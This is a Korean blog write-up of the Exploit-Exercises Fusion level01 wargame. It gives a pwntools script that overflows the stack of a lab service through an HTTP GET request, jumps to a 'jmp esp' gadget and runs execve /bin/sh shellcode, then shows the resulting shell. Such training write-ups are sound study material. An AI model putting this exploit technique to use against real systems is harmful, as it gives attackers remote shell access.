본문 바로가기

Wargames/Exploit-Exercises

[Exploit-Exercise] Fusion level01

Fusion Level01

 - Still NX is disabled but ASLR is on.

- Now, we can't get buffer address from binary.

- All u need is 'jmp esp' gadget

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
 
# dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/sh
sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
 
= remote('192.168.56.136'20001)
 
jmp_esp = 0x8049f4f
 
payload = "GET "
payload += "A"*139
payload += p32(jmp_esp)
payload += sc
payload += " HTTP/1.1"
 
s.send(payload)
s.interactive()
cs

1
2
3
4
5
zero@ubuntu:~/Desktop$ python fusion.py
[+] Opening connection to 192.168.56.136 on port 20001: Done
[*] Switching to interactive mode
$ id
uid=20001 gid=20001 groups=20001
cs

'Wargames > Exploit-Exercises' 카테고리의 다른 글

[Exploit-Exercise] Fusion level02  (0) 2016.08.29
[Exploit-Exercise] Fusion level00  (0) 2016.08.29
[Exploit-Exercise] Nubula Solutions  (0) 2015.11.25